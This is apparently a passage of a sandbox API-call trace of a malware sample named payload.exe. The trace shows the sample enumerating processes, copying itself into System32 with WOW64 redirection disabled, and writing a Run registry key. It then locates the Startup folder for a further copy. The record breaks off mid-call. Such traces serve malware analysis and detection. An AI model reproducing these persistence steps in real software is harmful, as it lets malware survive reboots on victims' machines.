(in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0031.235] lstrlenW (lpString="audiodg.exe") returned 11 [0031.235] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.236] lstrlenW (lpString="svchost.exe") returned 11 [0031.236] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x124, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.236] lstrlenW (lpString="svchost.exe") returned 11 [0031.236] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x334, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0031.237] lstrlenW (lpString="dwm.exe") returned 7 [0031.237] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0031.237] lstrlenW (lpString="explorer.exe") returned 12 [0031.237] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0031.238] lstrlenW (lpString="spoolsv.exe") returned 11 [0031.238] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0031.239] lstrlenW (lpString="taskhost.exe") returned 12 [0031.239] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0031.239] lstrlenW (lpString="svchost.exe") returned 11 [0031.239] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x50c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x36c, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskeng.exe")) returned 1 [0031.240] lstrlenW (lpString="taskeng.exe") returned 11 [0031.240] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xc, th32ParentProcessID=0x1cc, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0031.240] lstrlenW (lpString="taskhost.exe") returned 12 [0031.240] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x78c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="carried trinity.exe")) returned 1 [0031.241] lstrlenW (lpString="carried trinity.exe") returned 19 [0031.241] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="heaven.exe")) returned 1 [0031.241] lstrlenW (lpString="heaven.exe") returned 10 [0031.241] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dell.exe")) returned 1 [0031.242] lstrlenW (lpString="dell.exe") returned 8 [0031.242] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="consequence lonely nato.exe")) returned 1 [0031.242] lstrlenW (lpString="consequence lonely nato.exe") returned 27 [0031.242] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x618, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="gotten_commit_philip.exe")) returned 1 [0031.243] lstrlenW (lpString="gotten_commit_philip.exe") returned 24 [0031.243] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x344, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="til ear equal.exe")) returned 1 [0031.244] lstrlenW (lpString="til ear equal.exe") returned 17 [0031.244] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x244, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="itunes-bring.exe")) returned 1 [0031.244] lstrlenW (lpString="itunes-bring.exe") returned 16 [0031.244] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tide_instances_ee.exe")) returned 1 [0031.245] lstrlenW (lpString="tide_instances_ee.exe") returned 21 [0031.245] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x314, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="philadelphia.exe")) returned 1 [0031.245] lstrlenW (lpString="philadelphia.exe") returned 16 [0031.245] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x274, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="litigation_rows_careers.exe")) returned 1 [0031.246] lstrlenW (lpString="litigation_rows_careers.exe") returned 27 [0031.246] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x518, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="ict virginia cameras.exe")) returned 1 [0031.247] lstrlenW (lpString="ict virginia cameras.exe") returned 24 [0031.247] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x438, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="fraud stuck.exe")) returned 1 [0031.247] lstrlenW (lpString="fraud stuck.exe") returned 15 [0031.247] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7f0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="innovative-essential-very.exe")) returned 1 [0031.248] lstrlenW (lpString="innovative-essential-very.exe") returned 29 [0031.248] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="attended.exe")) returned 1 [0031.248] lstrlenW (lpString="attended.exe") returned 12 [0031.248] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x58c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="tolerance-cartridges.exe")) returned 1 [0031.249] lstrlenW (lpString="tolerance-cartridges.exe") returned 24 [0031.249] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="pan physician.exe")) returned 1 [0031.249] lstrlenW (lpString="pan physician.exe") returned 17 [0031.250] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="yesterday_sagem_indexes.exe")) returned 1 [0031.250] lstrlenW (lpString="yesterday_sagem_indexes.exe") returned 27 [0031.250] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x588, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="graphsheadlinehull.exe")) returned 1 [0031.251] lstrlenW (lpString="graphsheadlinehull.exe") returned 22 [0031.251] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="over-celebrity.exe")) returned 1 [0031.251] lstrlenW (lpString="over-celebrity.exe") returned 18 [0031.251] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0031.252] lstrlenW (lpString="WmiPrvSE.exe") returned 12 [0031.252] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x908, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0031.252] lstrlenW (lpString="dllhost.exe") returned 11 [0031.252] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x944, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x254, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0031.253] lstrlenW (lpString="dllhost.exe") returned 11 [0031.253] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0031.253] lstrlenW (lpString="payload.exe") returned 11 [0031.253] Process32NextW (in: hSnapshot=0xe0, lppe=0x18fb7c | out: lppe=0x18fb7c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x964, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 0 [0031.254] CloseHandle (hObject=0xe0) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605270 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6052b8 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605300 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605320 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605368 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x604a08 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4720 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4758 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4350 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4378 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e47a0 | out: hHeap=0x5d0000) returned 1 [0031.254] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e43a0 | out: hHeap=0x5d0000) returned 1 [0031.254] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x60b430 [0031.254] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x61b438 [0031.255] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.255] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x5e43a0 [0031.255] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e43a0, Size=0x40) returned 0x6069b0 [0031.255] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.255] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x5e43a0 [0031.255] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.255] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x5e4378 [0031.255] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.255] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x5e4350 [0031.255] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4350, Size=0x40) returned 0x6069f8 [0031.255] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x61b438, nSize=0x7fff | out: lpFilename="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\payload.exe")) returned 0x31 [0031.255] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x62b440 [0031.255] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x63b448 [0031.256] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.256] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x5e4350 [0031.256] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x5e4350, Size=0x40) returned 0x606a40 [0031.256] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x606a40, Size=0x80) returned 0x605270 [0031.256] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x605270, Size=0x100) returned 0x607bb8 [0031.256] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.256] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x607bb8 | out: hHeap=0x5d0000) returned 1 [0031.256] ExpandEnvironmentStringsW (in: lpSrc="%windir%\\System32\\payload.exe", lpDst=0x62b440, nSize=0x7fff | out: lpDst="C:\\Windows\\System32\\payload.exe") returned 0x20 [0031.256] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63b448 | out: hHeap=0x5d0000) returned 1 [0031.256] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62b440 | out: hHeap=0x5d0000) returned 1 [0031.256] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x20b0020 [0031.256] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.256] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x5e4350 [0031.256] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.256] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x605938 [0031.256] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.256] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.256] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x0) returned 1 [0031.256] lstrlenW (lpString="kernel32.dll") returned 12 [0031.256] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x5e4350 | out: hHeap=0x5d0000) returned 1 [0031.256] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.256] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605938 | out: hHeap=0x5d0000) returned 1 [0031.256] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\payload.exe" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\payload.exe"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe0 [0031.257] CreateFileW (lpFileName="C:\\Windows\\System32\\payload.exe" (normalized: "c:\\windows\\system32\\payload.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xe4 [0031.259] ReadFile (in: hFile=0xe0, lpBuffer=0x20b0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20b0020*, lpNumberOfBytesRead=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0031.272] WriteFile (in: hFile=0xe4, lpBuffer=0x20b0020*, nNumberOfBytesToWrite=0x17200, lpNumberOfBytesWritten=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20b0020*, lpNumberOfBytesWritten=0x18fd98*=0x17200, lpOverlapped=0x0) returned 1 [0031.274] ReadFile (in: hFile=0xe0, lpBuffer=0x20b0020, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x18fd98, lpOverlapped=0x0 | out: lpBuffer=0x20b0020*, lpNumberOfBytesRead=0x18fd98*=0x0, lpOverlapped=0x0) returned 1 [0031.274] CloseHandle (hObject=0xe4) returned 1 [0031.276] CloseHandle (hObject=0xe0) returned 1 [0031.277] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.277] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x605938 [0031.277] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.277] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x6058e8 [0031.277] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x76c20000 [0031.277] GetProcAddress (hModule=0x76c20000, lpProcName="Wow64DisableWow64FsRedirection") returned 0x76c4d650 [0031.277] Wow64DisableWow64FsRedirection (in: OldValue=0x18fd9c | out: OldValue=0x18fd9c*=0x1) returned 1 [0031.277] lstrlenW (lpString="kernel32.dll") returned 12 [0031.277] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x6058e8 | out: hHeap=0x5d0000) returned 1 [0031.277] lstrlenA (lpString="Wow64DisableWow64FsRedirection") returned 30 [0031.277] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605938 | out: hHeap=0x5d0000) returned 1 [0031.277] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x20b0020 | out: hHeap=0x5d0000) returned 1 [0031.282] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.282] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x605938 [0031.282] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x605938, Size=0x40) returned 0x606a40 [0031.282] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x606a40, Size=0x80) returned 0x62b458 [0031.282] lstrlenW (lpString="C:\\Windows\\System32\\payload.exe") returned 31 [0031.282] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0031.282] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x5c) returned 0x605270 [0031.282] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Run", ulOptions=0x0, samDesired=0x20106, phkResult=0x18fd6c | out: phkResult=0x18fd6c*=0xe0) returned 0x0 [0031.283] RegSetValueExW (in: hKey=0xe0, lpValueName="payload.exe", Reserved=0x0, dwType=0x1, lpData="C:\\Windows\\System32\\payload.exe", cbData=0x3e | out: lpData="C:\\Windows\\System32\\payload.exe") returned 0x0 [0031.283] RegCloseKey (hKey=0xe0) returned 0x0 [0031.283] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x605270 | out: hHeap=0x5d0000) returned 1 [0031.283] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Run") returned 45 [0031.284] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62b458 | out: hHeap=0x5d0000) returned 1 [0031.284] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x62d440 [0031.284] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0xfffe) returned 0x63d448 [0031.284] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a08 [0031.284] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a08, Size=0x20) returned 0x605938 [0031.284] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x605938, Size=0x40) returned 0x606a40 [0031.284] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x606a40, Size=0x80) returned 0x62b458 [0031.284] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x62b458, Size=0x100) returned 0x607bb8 [0031.284] lstrlenW (lpString="") returned 0 [0031.284] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.284] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8c) returned 0x607cc0 [0031.284] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe0) returned 0x0 [0031.284] RegQueryValueExW (in: hKey=0xe0, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x63d448, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x0, lpData=0x63d448*=0x53, lpcbData=0x18fd50*=0x7fff) returned 0x2 [0031.284] RegCloseKey (hKey=0xe0) returned 0x0 [0031.284] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x607cc0 | out: hHeap=0x5d0000) returned 1 [0031.284] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.284] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x8c) returned 0x607cc0 [0031.284] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders", ulOptions=0x0, samDesired=0x20119, phkResult=0x18fd18 | out: phkResult=0x18fd18*=0xe4) returned 0x0 [0031.284] RegQueryValueExW (in: hKey=0xe4, lpValueName="Startup", lpReserved=0x0, lpType=0x18fd24, lpData=0x63d448, lpcbData=0x18fd50*=0x7fff | out: lpType=0x18fd24*=0x2, lpData="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup", lpcbData=0x18fd50*=0x98) returned 0x0 [0031.284] RegCloseKey (hKey=0xe4) returned 0x0 [0031.284] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x607cc0 | out: hHeap=0x5d0000) returned 1 [0031.284] lstrlenW (lpString="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup") returned 75 [0031.284] lstrlenW (lpString="Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\User Shell Folders") returned 69 [0031.285] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x607bb8 | out: hHeap=0x5d0000) returned 1 [0031.285] ExpandEnvironmentStringsW (in: lpSrc="%USERPROFILE%\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe", lpDst=0x62d440, nSize=0x7fff | out: lpDst="C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Roaming\\Microsoft\\Windows\\Start Menu\\Programs\\Startup\\payload.exe") returned 0x68 [0031.285] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x63d448 | out: hHeap=0x5d0000) returned 1 [0031.285] HeapFree (in: hHeap=0x5d0000, dwFlags=0x0, lpMem=0x62d440 | out: hHeap=0x5d0000) returned 1 [0031.285] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x100000) returned 0x20b0020 [0031.285] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.285] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, Ptr=0x604a38, Size=0x20) returned 0x605938 [0031.285] RtlAllocateHeap (HeapHandle=0x5d0000, Flags=0x0, Size=0x10) returned 0x604a38 [0031.285] RtlReAllocateHeap (Heap=0x5d0000, Flags=0x0, 